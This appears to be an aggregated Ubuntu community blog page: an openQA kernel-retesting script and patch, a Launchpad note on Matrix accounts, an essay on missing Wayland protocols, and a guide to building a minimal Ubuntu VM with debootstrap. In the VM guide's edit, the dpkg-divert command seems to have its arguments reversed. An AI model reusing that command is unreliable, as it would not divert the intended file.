+    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional || get_var('FORCE_SERIAL_TERMINAL')) {
         # System is already booted after installation, just switch terminal
         select_serial_terminal;
     } else {
@@ -476,7 +476,7 @@ sub run {
         reboot_on_changes;
     } elsif (!get_var('KGRAFT')) {
         power_action('reboot', textmode => 1);
-        $self->wait_boot if get_var('LTP_BAREMETAL');
+        $self->wait_boot if (get_var('FORCE_SERIAL_TERMINAL') || get_var('LTP_BAREMETAL'));
     }
 }
 

Likely I’ll make a new pull request to have this in the test distribution, but for now this is good enough to help kernel developers to do some self-service and trigger their own openQA tests, that have many more tests (hopefully in parallel) and faster than if there was a person doing all of this manually.

Special thanks to the QE Kernel team, who do the amazing job of thinking of some scenarios like this, because they save a lot of time.

on January 25, 2024 12:00 AM

layout: post title: Testing kernels with sporadic issues until heisenbug shows in openQA categories:

Now, while hunting for bsc#1219073 which is quite sporadic, and took quite some time to show up often enough so that became noticeable and traceable, once stars aligned and managed to find a way to get a higher failure rate, I wanted to have a way for me and for the developer to test the kernel with the different patches to help with the bisecting and ease the process of finding the culprit and finding a solution for it.

I came with a fairly simple solution, using the --repeat parameter of the openqa-cli tool, and a simple shell script to run it:

```bash
$ cat ~/Downloads/trigger-kernel-openqa-mdadm.sh
# the kernel repo must be the one without https; tests don't have the kernel CA installed
KERNEL="KOTD_REPO=http://download.opensuse.org/repositories/Kernel:/linux-next/standard/"

REPEAT="--repeat 100" # using 100 by default
JOBS="https://openqa.your.instan.ce/tests/13311283 https://openqa.your.instan.ce/tests/13311263 https://openqa.your.instan.ce/tests/13311276 https://openqa.your.instan.ce/tests/13311278"
BUILD="bsc1219073"
for JOB in $JOBS; do 
	openqa-clone-job --within-instance $JOB CASEDIR=https://github.com/foursixnine/os-autoinst-distri-opensuse.git#tellmewhy ${REPEAT} \
		_GROUP=DEVELOPERS ${KERNEL} BUILD=${BUILD} FORCE_SERIAL_TERMINAL=1\
		TEST="${BUILD}_checkmdadm" YAML_SCHEDULE=schedule/qam/QR/15-SP5/textmode/textmode-skip-registration-extra.yaml INSTALLONLY=0 DESKTOP=textmode\
		|& tee jobs-launched.list;
done;

There are few things to note here:

  • the kernel repo must be the one without https; tests don’t have the CA installed by default.
  • the --repeat parameter is set to 100 by default, but can be changed to whatever number is desired.
  • the JOBS variable contains the list of jobs to clone and run, having all supported architecures is recommended (at least for this case)
  • the BUILD variable can be anything, but it’s recommended to use the bug number or something that makes sense.
  • the TEST variable is used to set the name of the test as it will show in the test overview page, you can use TEST+=foo if you want to append text instead of overriding it, the --repeat parameter, will append a number incrementally to your test, see os-autoinst/openQA#5331 for more details.
  • the YAML_SCHEDULE variable is used to set the yaml schedule to use, there are other ways to modify the schedule, but in this case I want to perform a full installation

Running the script

  • Ensure you can run at least the openQA client; if you need API keys, see post linked at the beginning of this post
  • replace the kernel repo with your branch in line 5
  • run the script $ bash trigger-kernel-openqa-mdadm.sh and you should get the following, times the --repeat if you modified it
1 job has been created:
 - sle-15-SP5-Full-QR-x86_64-Build134.5-skip_registration+workaround_modules@64bit -> https://openqa.your.instan.ce/tests/13345270

Each URL, will be a job triggered in openQA, depending on the load and amount of jobs, you might need to wait quite a bit (some users can help moving the priority of these jobs so it executes faster)

The review stuff:

Looking at the results

  • Go to https://openqa.your.instan.ce/tests/overview?distri=sle&build=bsc1219073&version=15-SP5 or from any job from the list above click on Job groups menu at the top, and select Build bsc1219073
  • Click on “Filter”
  • type the name of the test module to filter in the field Module name, e.g mdadm, and select the desired result of such test module e.g failed (you can also type, and select multiple result types)
  • Click Apply
  • The overall summary of the build overview page, will provide you with enough information to calculate the pass/fail rate.

A rule of thumb: anything above 5% is bad, but you need to also understand your sample size + the setup you’re using; YMMV.

Ain’t nobody got time to wait

The script will generate a file called: jobs-launched.list, in case you absolutely need to change the priority of the jobs, set it to 45, so it runs higher than default priority, which is 50 cat jobs-launched.list | grep https | sed -E 's/^.*->\s.*tests\///' | xargs -r -I {} bash -c "openqa-cli api --osd -X POST jobs/{}/prio prio=45; sleep 1"

The magic

The actual magic is in the schedule, so right after booting the system and setting it up, before running the mdadm test, I inserted the update_kernel module, which will add the kernel repo specified by KOTD_REPO, and install the kernel from there, reboot the system, and leave the system ready for the actual test, however I had to add very small changes:

---
 tests/kernel/update_kernel.pm | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/kernel/update_kernel.pm b/tests/kernel/update_kernel.pm
index 1d6312bee0dc..048da593f68f 100644
--- a/tests/kernel/update_kernel.pm
+++ b/tests/kernel/update_kernel.pm
@@ -398,7 +398,7 @@ sub boot_to_console {
 sub run {
     my $self = shift;
 
-    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional) {
+    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional || get_var('FORCE_SERIAL_TERMINAL')) {
         # System is already booted after installation, just switch terminal
         select_serial_terminal;
     } else {
@@ -476,7 +476,7 @@ sub run {
         reboot_on_changes;
     } elsif (!get_var('KGRAFT')) {
         power_action('reboot', textmode => 1);
-        $self->wait_boot if get_var('LTP_BAREMETAL');
+        $self->wait_boot if (get_var('FORCE_SERIAL_TERMINAL') || get_var('LTP_BAREMETAL'));
     }
 }
 

Likely I’ll make a new pull request to have this in the test distribution, but for now this is good enough to help kernel developers to do some self-service and trigger their own openQA tests, that have many more tests (hopefully in parallel) and faster than if there was a person doing all of this manually.

Special thanks to the QE Kernel team, who do the amazing job of thinking of some scenarios like this, because they save a lot of time.

on January 25, 2024 12:00 AM

January 22, 2024

Users can now add their Matrix accounts to their profile in Launchpad, as requested by Canonical’s Community team.

We also took the chance to slightly rework the frontend and how we display social accounts in the user profiles. Instead of having different sections in the profile for each social account , all social accounts are now all under a “Social Accounts” section.

Adding a new matrix account to your profile works similarly to how it has always worked for other accounts. Under the “Social Accounts” section in your user profile, you should now see a “No matrix accounts registered” and an edit button that will lead you to the Matrix accounts edit page. To edit, remove or add new ones, you will see an edit button in front of your newly added accounts in your profile.

We also added new API endpoints Person.social_accounts and Person.getSocialAccountsByPlatform() that will list the social accounts for a user. For more information, see our API documentation.

Currently, only Matrix was added as a social platform. But during this process, we made it much easier for Launchpad developers to add new social platforms to Launchpad in the future.

on January 22, 2024 04:30 PM

January 11, 2024

This post is in part a response to an aspect of Nate’s post “Does Wayland really break everything?“, but also my reflection on discussing Wayland protocol additions, a unique pleasure that I have been involved with for the past months1.

Some facts

Before I start I want to make a few things clear: The Linux desktop will be moving to Wayland2 – this is a fact at this point (and has been for a while), sticking to X11 makes no sense for future projects. From reading Wayland protocols and working with it at a much lower level than I ever wanted to, it is also very clear to me that Wayland is an exceptionally well-designed core protocol, and so are the additional extension protocols (xdg-shell & Co.). The modularity of Wayland is great, it gives it incredible flexibility and will for sure turn out to be good for the long-term viability of this project (and also provides a path to correct protocol issues in future, if one is found). In other words: Wayland is an amazing foundation to build on, and a lot of its design decisions make a lot of sense!

The shift towards people seeing “Linux” more as an application developer platform, and taking PipeWire and XDG Portals into account when designing for Wayland is also an amazing development and I love to see this – this holistic approach is something I always wanted!

Furthermore, I think Wayland removes a lot of functionality that shouldn’t exist in a modern compositor – and that’s a good thing too! Some of X11’s features and design decisions had clear drawbacks that we shouldn’t replicate. I highly recommend to read Nate’s blog post, it’s very good and goes into more detail. And due to all of this, I firmly believe that any advancement in the Wayland space must come from within the project.

But!

But! Of course there was a “but” coming 😉 – I think while developing Wayland-as-an-ecosystem we are now entrenched into narrow concepts of how a desktop should work. While discussing Wayland protocol additions, a lot of concepts clash, people from different desktops with different design philosophies debate the merits of those over and over again never reaching any conclusion (just as you will never get an answer out of humans whether sushi or pizza is the clearly superior food, or whether CSD or SSD is better). Some people want to use Wayland as a vehicle to force applications to submit to their desktop’s design philosophies, others prefer the smallest and leanest protocol possible, other developers want the most elegant behavior possible. To be clear, I think those are all very valid approaches.

But this also creates problems: By switching to Wayland compositors, we are already forcing a lot of porting work onto toolkit developers and application developers. This is annoying, but just work that has to be done. It becomes frustrating though if Wayland provides toolkits with absolutely no way to reach their goal in any reasonable way. For Nate’s Photoshop analogy: Of course Linux does not break Photoshop, it is Adobe’s responsibility to port it. But what if Linux was missing a crucial syscall that Photoshop needed for proper functionality and Adobe couldn’t port it without that? In that case it becomes much less clear on who is to blame for Photoshop not being available.

A lot of Wayland protocol work is focused on the environment and design, while applications and work to port them often is considered less. I think this happens because the overlap between application developers and developers of the desktop environments is not necessarily large, and the overlap with people willing to engage with Wayland upstream is even smaller. The combination of Windows developers porting apps to Linux and having involvement with toolkits or Wayland is pretty much nonexistent. So they have less of a voice.

A quick detour through the neuroscience research lab

I have been involved with Freedesktop, GNOME and KDE for an incredibly long time now (more than a decade), but my actual job (besides consulting for Purism) is that of a PhD candidate in a neuroscience research lab (working on the morphology of biological neurons and its relation to behavior). I am mostly involved with three research groups in our institute, which is about 35 people. Most of us do all our data analysis on powerful servers which we connect to using RDP (with KDE Plasma as desktop). Since I joined, I have been pushing the envelope a bit to extend Linux usage to data acquisition and regular clients, and to have our data acquisition hardware interface well with it. Linux brings some unique advantages for use in research, besides the obvious one of having every step of your data management platform introspectable with no black boxes left, a goal I value very highly in research (but this would be its own blogpost).

In terms of operating system usage though, most systems are still Windows-based. Windows is what companies develop for, and what people use by default and are familiar with. The choice of operating system is very strongly driven by application availability, and WSL being really good makes this somewhat worse, as it removes the need for people to switch to a real Linux system entirely if there is the occasional software requiring it. Yet, we have a lot more Linux users than before, and use it in many places where it makes sense. I also developed a novel data acquisition software that even runs on Linux-only and uses the abilities of the platform to its fullest extent. All of this resulted in me asking existing software and hardware vendors for Linux support a lot more often. Vendor-customer relationship in science is usually pretty good, and vendors do usually want to help out. Same for open source projects, especially if you offer to do Linux porting work for them… But overall, the ease of use and availability of required applications and their usability rules supreme. Most people are not technically knowledgeable and just want to get their research done in the best way possible, getting the best results with the least amount of friction.

KDE/Linux usage at a control station for a particle accelerator at Adlershof Technology Park, Germany, for reference (by 25years of KDE)3

Back to the point

The point of that story is this: GNOME, KDE, RHEL, Debian or Ubuntu: They all do not matter if the necessary applications are not available for them. And as soon as they are, the easiest-to-use solution wins. There are many facets of “easiest”: In many cases this is RHEL due to Red Hat support contracts being available, in many other cases it is Ubuntu due to its mindshare and ease of use. KDE Plasma is also frequently seen, as it is perceived a bit easier to onboard Windows users with it (among other benefits). Ultimately, it comes down to applications and 3rd-party support though.

Here’s a dirty secret: In many cases, porting an application to Linux is not that difficult. The thing that companies (and FLOSS projects too!) struggle with and will calculate the merits of carefully in advance is whether it is worth the support cost as well as continuous QA/testing. Their staff will have to do all of that work, and they could spend that time on other tasks after all.

So if they learn that “porting to Linux” not only means added testing and support, but also means to choose between the legacy X11 display server that allows for 1:1 porting from Windows or the “new” Wayland compositors that do not support the same features they need, they will quickly consider it not worth the effort at all. I have seen this happen.

Of course many apps use a cross-platform toolkit like Qt, which greatly simplifies porting. But this just moves the issue one layer down, as now the toolkit needs to abstract Windows, macOS and Wayland. And Wayland does not contain features to do certain things or does them very differently from e.g. Windows, so toolkits have no way to actually implement the existing functionality in a way that works on all platforms. So in Qt’s documentation you will often find texts like “works everywhere except for on Wayland compositors or mobile”4.

Many missing bits or altered behavior are just papercuts, but those add up. And if users will have a worse experience, this will translate to more support work, or people not wanting to use the software on the respective platform.

What’s missing?

Window positioning

SDI applications with multiple windows are very popular in the scientific world. For data acquisition (for example with microscopes) we often have one monitor with control elements and one larger one with the recorded image. There is also other configurations where multiple signal modalities are acquired, and the experimenter aligns windows exactly in the way they want and expects the layout to be stored and to be loaded upon reopening the application. Even in the image from Adlershof Technology Park above you can see this style of UI design, at mega-scale. Being able to pop-out elements as windows from a single-window application to move them around freely is another frequently used paradigm, and immensely useful with these complex apps.

It is important to note that this is not a legacy design, but in many cases an intentional choice – these kinds of apps work incredibly well on larger screens or many screens and are very flexible (you can have any window configuration you want, and switch between them using the (usually) great window management abilities of your desktop).

Of course, these apps will work terribly on tablets and small form factors, but that is not the purpose they were designed for and nobody would use them that way.

I assumed for sure these features would be implemented at some point, but when it became clear that that would not happen, I created the ext-placement protocol which had some good discussion but was ultimately rejected from the xdg namespace. I then tried another solution based on feedback, which turned out not to work for most apps, and now proposed xdg-placement (v2) in an attempt to maybe still get some protocol done that we can agree on, exploring more options before pushing the existing protocol for inclusion into the ext Wayland protocol namespace. Meanwhile though, we can not port any application that needs this feature, while at the same time we are switching desktops and distributions to Wayland by default.

Window position restoration

Similarly, a protocol to save & restore window positions was already proposed in 2018, 6 years ago now, but it has still not been agreed upon, and may not even help multiwindow apps in its current form. The absence of this protocol means that applications can not restore their former window positions, and the user has to move them to their previous place again and again.

Meanwhile, toolkits can not adopt these protocols and applications can not use them and can not be ported to Wayland without introducing papercuts.

Window icons

Similarly, individual windows can not set their own icons, and not-installed applications can not have an icon at all because there is no desktop-entry file to load the icon from and no icon in the theme for them. You would think this is a niche issue, but for applications that create many windows, providing icons for them so the user can find them is fairly important. Of course it’s not the end of the world if every window has the same icon, but it’s one of those papercuts that make the software slightly less user-friendly. Even applications with fewer windows like LibrePCB are affected, so much so that they rather run their app through Xwayland for now.

I decided to address this after I was working on data analysis of image data in a Python virtualenv, where my code and the Python libraries used created lots of windows all with the default yellow “W” icon, making it impossible to distinguish them at a glance. This is xdg-toplevel-icon now, but of course it is an uphill battle where the very premise of needing this is questioned. So applications can not use it yet.

Limited window abilities requiring specialized protocols

Firefox has a picture-in-picture feature, allowing it to pop out media from a mediaplayer as separate floating window so the user can watch the media while doing other things. On X11 this is easily realized, but on Wayland the restrictions posed on windows necessitate a different solution. The xdg-pip protocol was proposed for this specialized usecase, but it is also not merged yet. So this feature does not work as well on Wayland.

Automated GUI testing / accessibility / automation

Automation of GUI tasks is a powerful feature, so is the ability to auto-test GUIs. This is being worked on, with libei and wlheadless-run (and stuff like ydotool exists too), but we’re not fully there yet.

Wayland is frustrating for (some) application authors

As you see, there is valid applications and valid usecases that can not be ported yet to Wayland with the same feature range they enjoyed on X11, Windows or macOS. So, from an application author’s perspective, Wayland does break things quite significantly, because things that worked before can no longer work and Wayland (the whole stack) does not provide any avenue to achieve the same result.

Wayland does “break” screen sharing, global hotkeys, gaming latency (via “no tearing”) etc, however for all of these there are solutions available that application authors can port to. And most developers will gladly do that work, especially since the newer APIs are usually a lot better and more robust. But if you give application authors no path forward except “use Xwayland and be on emulation as second-class citizen forever”, it just results in very frustrated application developers.

For some application developers, switching to a Wayland compositor is like buying a canvas from the Linux shop that forces your brush to only draw triangles. But maybe for your avant-garde art, you need to draw a circle. You can approximate one with triangles, but it will never be as good as the artwork of your friends who got their canvases from the Windows or macOS art supply shop and have more freedom to create their art.

Triangles are proven to be the best shape! If you are drawing circles you are creating bad art!

Wayland, via its protocol limitations, forces a certain way to build application UX – often for the better, but also sometimes to the detriment of users and applications. The protocols are often fairly opinionated, a result of the lessons learned from X11. In any case though, it is the odd one out – Windows and macOS do not pose the same limitations (for better or worse!), and the effort to port to Wayland is orders of magnitude bigger, or sometimes in case of the multiwindow UI paradigm impossible to achieve to the same level of polish. Desktop environments of course have a design philosophy that they want to push, and want applications to integrate as much as possible (same as macOS and Windows!). However, there are many applications out there, and pushing a design via protocol limitations will likely just result in fewer apps.

The porting dilemma

I spent probably way too much time looking into how to get applications cross-platform and running on Linux, often talking to vendors (FLOSS and proprietary) as well. Wayland limitations aren’t the biggest issue by far, but they do start to come come up now, especially in the scientific space with Ubuntu having switched to Wayland by default. For application authors there is often no way to address these issues. Many scientists do not even understand why their Python script that creates some GUIs suddenly behaves weirdly because Qt is now using the Wayland backend on Ubuntu instead of X11. They do not know the difference and also do not want to deal with these details – even though they may be programmers as well, the real goal is not to fiddle with the display server, but to get to a scientific result somehow.

Another issue is portability layers like Wine which need to run Windows applications as-is on Wayland. Apparently Wine’s Wayland driver has some heuristics to make window positioning work (and I am amazed by the work done on this!), but that can only go so far.

A way out?

So, how would we actually solve this? Fundamentally, this excessively long blog post boils down to just one essential question:

Do we want to force applications to submit to a UX paradigm unconditionally, potentially loosing out on application ports or keeping apps on X11 eternally, or do we want to throw them some rope to get as many applications ported over to Wayland, even through we might sacrifice some protocol purity?

I think we really have to answer that to make the discussions on wayland-protocols a lot less grueling. This question can be answered at the wayland-protocols level, but even more so it must be answered by the individual desktops and compositors.

If the answer for your environment turns out to be “Yes, we want the Wayland protocol to be more opinionated and will not make any compromises for application portability”, then your desktop/compositor should just immediately NACK protocols that add something like this and you simply shouldn’t engage in the discussion, as you reject the very premise of the new protocol: That it has any merit to exist and is needed in the first place. In this case contributors to Wayland and application authors also know where you stand, and a lot of debate is skipped. Of course, if application authors want to support your environment, you are basically asking them now to rewrite their UI, which they may or may not do. But at least they know what to expect and how to target your environment.

If the answer turns out to be “We do want some portability”, the next question obviously becomes where the line should be drawn and which changes are acceptable and which aren’t. We can’t blindly copy all X11 behavior, some porting work to Wayland is simply inevitable. Some written rules for that might be nice, but probably more importantly, if you agree fundamentally that there is an issue to be fixed, please engage in the discussions for the respective MRs! We for sure do not want to repeat X11 mistakes, and I am certain that we can implement protocols which provide the required functionality in a way that is a nice compromise in allowing applications a path forward into the Wayland future, while also being as good as possible and improving upon X11. For example, the toplevel-icon proposal is already a lot better than anything X11 ever had. Relaxing ACK requirements for the ext namespace is also a good proposed administrative change, as it allows some compositors to add features they want to support to the shared repository easier, while also not mandating them for others. In my opinion, it would allow for a lot less friction between the two different ideas of how Wayland protocol development should work. Some compositors could move forward and support more protocol extensions, while more restrictive compositors could support less things. Applications can detect supported protocols at launch and change their behavior accordingly (ideally even abstracted by toolkits).

You may now say that a lot of apps are ported, so surely this issue can not be that bad. And yes, what Wayland provides today may be enough for 80-90% of all apps. But what I hope the detour into the research lab has done is convince you that this smaller percentage of apps matters. A lot. And that it may be worthwhile to support them.

To end on a positive note: When it came to porting concrete apps over to Wayland, the only real showstoppers so far5 were the missing window-positioning and window-position-restore features. I encountered them when porting my own software, and I got the issue as feedback from colleagues and fellow engineers. In second place was UI testing and automation support, the window-icon issue was mentioned twice, but being a cosmetic issue it likely simply hurts people less and they can ignore it easier.

What this means is that the majority of apps are already fine, and many others are very, very close! A Wayland future for everyone is within our grasp! 😄

I will also bring my two protocol MRs to their conclusion for sure, because as application developers we need clarity on what the platform (either all desktops or even just a few) supports and will or will not support in future. And the only way to get something good done is by contribution and friendly discussion.

Footnotes

  1. Apologies for the clickbait-y title – it comes with the subject 😉 ↩
  2. When I talk about “Wayland” I mean the combined set of display server protocols and accepted protocol extensions, unless otherwise clarified. ↩
  3. I would have picked a picture from our lab, but that would have needed permission first ↩
  4. Qt has awesome “platform issues” pages, like for macOS and Linux/X11 which help with porting efforts, but Qt doesn’t even list Linux/Wayland as supported platform. There is some information though, like window geometry peculiarities, which aren’t particularly helpful when porting (but still essential to know). ↩
  5. Besides issues with Nvidia hardware – CUDA for simulations and machine-learning is pretty much everywhere, so Nvidia cards are common, which causes trouble on Wayland still. It is improving though. ↩
on January 11, 2024 04:24 PM

November 30, 2023

Every so often I have to make a new virtual machine for some specific use case. Perhaps I need a newer version of Ubuntu than the one I’m running on my hardware in order to build some software, and containerization just isn’t working. Or maybe I need to test an app that I made modifications to in a fresh environment. In these instances, it can be quite helpful to be able to spin up these virtual machines quickly, and only install the bare minimum software you need for your use case.

One common strategy when making a minimal or specially customized install is to use a server distro (like Ubuntu Server for instance) as the base and then install other things on top of it. This sorta works, but it’s less than ideal for a couple reasons:

  • Server distros are not the same as minimal distros. They may provide or offer software and configurations that are intended for a server use case. For instance, the ubuntu-server metapackage in Ubuntu depends on software intended for RAID array configuration and logical volume management, and it recommends software that enables LXD virtual machine related features. Chances are you don’t need or want these sort of things.

  • They can be time-consuming to set up. You have to go through the whole server install procedure, possibly having to configure or reconfigure things that are pointless for your use case, just to get the distro to install. Then you have to log in and customize it, adding an extra step.

If you’re able to use Debian as your distro, these problems aren’t so bad since Debian is sort of like Arch Linux - there’s a minimal base that you build on to turn it into a desktop or server. But for Ubuntu, there’s desktop images (not usually what you want), server images (not usually what you want), cloud images (might be usable but could be tricky), and Ubuntu Core images (definitely not what you want for most use cases). So how exactly do you make a minimal Ubuntu VM?

As hinted at above, a cloud image might work, but we’re going to use a different solution here. As it turns out, you don’t actually have to use a prebuilt image or installer to install Ubuntu. Similar to the installation procedure Arch Linux provides, you can install Ubuntu manually, giving you very good control over what goes into your VM and how it’s configured.

This guide is going to be focused on doing a manual installation of Ubuntu into a VM, using debootstrap to install the initial minimal system. You can use this same technique to install Ubuntu onto physical hardware by just booting from a live USB and then using this technique on your hardware’s physical disk(s). However we’re going to be primarily focused on using a VM right now. Also, the virtualization software we’re going to be working with is QEMU. If you’re using a different hypervisor like VMware, VirtualBox, or Hyper-V, you can make a new VM and then install Ubuntu manually into it the same way you would install Ubuntu onto physical hardware using this technique. QEMU, however, provides special tools that make this procedure easier, and QEMU is more flexible than other virtualization software in my experience. You can install it by running sudo apt install qemu-system-x86 on your host system.

With that laid out, let us begin.

Open a terminal on your physical machine, and make a directory for your new VM to reside in. I’ll use “~/VMs/Ubuntu” here.

mkdir ~/VMs/Ubuntu
cd ~/VMs/Ubuntu

Next, let’s make a virtual disk image for the VM using the qemu-img utility.

qemu-img create -f qcow2 ubuntu.img 32G

This will make a 32 GiB disk image - feel free to customize the size or filename as you see fit. The -f parameter at the beginning specifies the VM disk image format. QCOW2 is usually a good option since the image will start out small and then get bigger as necessary. However, if you’re already using a copy-on-write filesystem like BTRFS or ZFS, you might want to use -f raw rather than -f qcow2 - this will make a raw disk image file and avoid the overhead of the QCOW2 file format.

Now we need to attach the disk image to the host machine as a device. I usually do this with you can use qemu-nbd, which can attach a QEMU-compatible disk image to your physical system as a network block device. These devices look and work just like physical disks, which makes them extremely handy for modifying the contents of a disk image.

qemu-nbd requires that the nbd kernel module be loaded, and at least on Ubuntu, it’s not loaded by default, so we need to load it before we can attach the disk image to our host machine.

sudo modprobe nbd
sudo qemu-nbd -f qcow2 -c /dev/nbd0 ./ubuntu.img

This will make our ubuntu.img file available through the /dev/nbd0 device. Make sure to specify the format via the -f switch, especially if you’re using a raw disk image. QEMU will keep you from writing a new partition table to the disk image if you give it a raw disk image without telling it directly that the disk image is raw.

Once your disk image is attached, we can partition it and format it just like a real disk. For simplicity’s sake, we’ll give the drive an MBR partition table, create a single partition enclosing all of the disk’s space, then format the partition as ext4.

sudo fdisk /dev/nbd0
n
p
1


w
sudo mkfs.ext4 /dev/nbd0p1

(The two blank lines are intentional - they just accept the default options for the partition’s first and last sector, which makes a partition that encloses all available space on the disk.)

Now we can mount the new partition.

mkdir vdisk
sudo mount /dev/nbd0p1 ./vdisk

Now it’s time to install the minimal Ubuntu system. You’ll need to know the first part of the codename for the Ubuntu version you intend to install. The codenames for Ubuntu releases are an adjective followed by the name of an animal, like “Jammy Jellyfish”. The first word (“Jammy” in this instance) is the one you need. These codenames are easy to look up online. Here’s the codenames for the currently supported LTS versions of Ubuntu, as well as the codename for the current development release:

+-------------------+-------+
| 20.04 | Focal |
|-------------------+-------+
| 22.04 | Jammy |
|-------------------+-------+
| 24.04 Development | Noble |
|-------------------+-------+

To install the initial minimal Ubuntu system, we’ll use the debootstrap utility. This utility will download and install the bare minimum packages needed to have a functional Ubuntu system. Keep in mind that the Ubuntu installation this tool makes is really minimal - it doesn’t even come with a bootloader or Linux kernel. We’ll need to make quite a few changes to this installation before it’s ready for use in a VM.

Assuming we’re installing Ubuntu 22.04 LTS into our VM, the command to use is:

sudo debootstrap jammy ./vdisk

After a few minutes, our new system should be downloaded and installed. (Note that debootstrap does require root privileges.)

Now we’re ready to customize the VM! To do this, we’ll use a utility called chroot - this utility allows us to “enter” an installed Linux system, so we can modify with it without having to boot it. (This is done by changing the root directory (from the perspective of the chroot process) to whatever directory you specify, then launching a shell or program inside the specified directory. The shell or program will see its root directory as being the directory you specified, and volia, it’s as if we’re “inside” the installed system without having to boot it. This is a very weak form of containerization and shouldn’t be relied on for security, but it’s perfect for what we’re doing.)

There’s one thing we have to account for before chrooting into our new Ubuntu installation. Some commands we need to run will assume that certain special directories are mounted properly - in particular, /proc should point to a procfs filesystem, /sys should point to a sysfs filesystem, /dev needs to contain all of the device files of our system, and /dev/pts needs to contain the device files for pseudoterminals (you don’t have to know what any of that means, just know that those four directories are important and have to be set up properly). If these directories are not properly mounted, some tools will behave strangely or not work at all. The easiest way to solve this problem is with bind mounts. These basically tell Linux to make the contents of one directory visible in some other directory too. (These are sort of like symlinks, but they work differently - a symlink says “I’m a link to something, go over here to see what I contain”, whereas a bind mount says “make this directory’s contents visible over here too”. The differences are subtle but important - a symlink can’t make files outside of a chroot visible inside the chroot. A bind mount, however, can.)

So let’s bind mount the needed directories from our system into the chroot:

sudo mount --bind /dev ./vdisk/dev
sudo mount --bind /proc ./vdisk/proc
sudo mount --bind /sys ./vdisk/sys
sudo mount --bind /dev/pts ./vdisk/dev/pts

And now we can chroot in!

sudo chroot ./vdisk

Run ping -c1 8.8.8.8 just to make sure that Internet access is working - if it’s not, you may need to copy the host’s /etc/resolv.conf file into the VM. However, you probably won’t have to do this. Assuming Internet is working, we can now start customizing things.

By default, debootstrap only enables the “main” repository of Ubuntu. This repository only contains free-and-open-source software that is supported by Canonical. This does *not* include most of the software available in Ubuntu - most of it is in the “universe”, “restricted”, and “multiverse” repositories. If you really know what you’re doing, you can leave some of these repositories out, but I would highly recommend you enable them. Also, only the “release” pocket is enabled by default - this pocket includes all of the software that came with your chosen version of Ubuntu when it was first released, but it doesn’t include bug fixes, security updates, or newer versions of software. All those are in the “updates”, “security”, and “backports” pockets.

To fix this, run the following block of code, adjusted for your release of Ubuntu:

tee /etc/apt/sources.list << ENDSOURCESLIST
deb http://archive.ubuntu.com/ubuntu jammy main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-updates main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-security main universe restricted multiverse
deb http://archive.ubuntu.com/ubuntu jammy-backports main universe restricted multiverse
ENDSOURCESLIST

Replace “jammy” with the codename corresponding to your chosen release of Ubuntu. Once you’ve run this, run cat /etc/apt/sources.list to make sure the file looks right, then run apt update to refresh your software database with the newly enabled repositories. Once that’s done, run apt full-upgrade to update any software in the base installation that’s out-of-date.

What exactly you install at this point is up to you, but here’s my list of recommendations:

  • linux-generic. Highly recommended. This provides the Linux kernel. Without it, you’re going to have significant trouble booting. You can replace this with a different kernel metapackage if you want to for some reason (like linux-lowlatency).

  • grub-pc. Highly recommended. This is the bootloader. You might be able to replace this with an alternative bootloader like systemd-boot.

  • vim (or some other decent text editor that runs in a terminal). Highly recommended. The minimal install of Ubuntu doesn’t come with a good text editor, and you’ll really want one of those most likely.

  • network-manager. Highly recommended. If you don’t install this or some other network manager, you won’t have Internet access. You can replace this with an alternative network manager if you’d like.

  • tmux. Recommended. Unless you’re going to install a graphical environment, you’ll probably want a terminal multiplexer so you don’t have to juggle TTYs (which is especially painful in QEMU).

  • openssh-server. Optional. This is handy since it lets you use your terminal emulator of choice on your physical machine to interface with the virtual machine. You won’t be stuck using a rather clumsy and slow TTY in a QEMU display.

  • pulseaudio. Very optional. Provides sound support within the VM.

  • icewm + xserver-xorg + xinit + xterm. Very optional. If you need or want a graphical environment, this should provide you with a fairly minimal and fast one. You’ll still log in at a TTY, but you can use startx to start a desktop.

Add whatever software you want to this list, remove whatever you don’t want, and then install it all with this command:

apt install listOfPackages

Replace “listOfPackages” with the actual list of packages you want to install. For instance, if I were to install everything in the above list except openssh-server, I would use:

apt install linux-generic grub-pc vim network-manager tmux icewm xserver-xorg xinit xterm

At this point our software is installed, but the VM still has a few things needed to get it going.

  • We need to install and configure the bootloader.

  • We need an /etc/fstab file, or the system will boot with the drive mounted read-only.

  • We should probably make a non-root user with sudo access.

  • There’s a file in Ubuntu that will prevent Internet access from working. We should delete it now.

The bootloader is pretty easy to install and configure. Just run:

sudo grub-install /dev/nbd0
sudo update-grub

For /etc/fstab, there are a few options. One particularly good one is to label the partition we installed Ubuntu into using e2label, then use that label as the ID of the drive we want to mount as root. That can be done like this:

e2label /dev/nbd0p1 ubuntu-inst
echo "LABEL=ubuntu-inst / ext4 defaults 0 1" > /etc/fstab

Making a user account is fairly easy:

adduser user # follow the prompts to create the user
adduser user sudo

And lastly, we should remove the Internet blocker file. I don’t understand why exactly this file exists in Ubuntu, but it does, and it causes problems for me when I make a minimal VM in this way. Removing it fixes the problem.

rm /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf

EDIT: January 21, 2024: This rm command doesn’t actually work forever - an update to NetworkManager can end up putting this file back, breaking networking again. Rather than using rm on it, you should dpkg-divert it somewhere benign, for instance with dpkg-divert --divert /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf --rename /var/nm-globally-managed-devices-junk.old, which should persist even after an update.

And that’s it! Now we can exit the chroot, unmount everything, and detach the disk image from our host machine.

exit
sudo umount ./vdisk/dev/pts
sudo umount ./vdisk/dev
sudo umount ./vdisk/proc
sudo umount ./vdisk/sys
sudo umount ./vdisk
sudo qemu-nbd -d /dev/nbd0

Now we can try and boot the VM. But before doing that, it’s probably a good idea to make a VM launcher script. Run vim ./startVM.sh (replacing “vim” with your text editor of choice), then type the following contents into the file:

#!/bin/bash
qemu-system-x86_64 -enable-kvm -machine q35 -m 4G -smp 2 -vga qxl -display sdl -monitor stdio -device intel-hda -device hda-duplex -usb -device usb-tablet -drive file=./ubuntu.img,format=qcow2,if=virtio

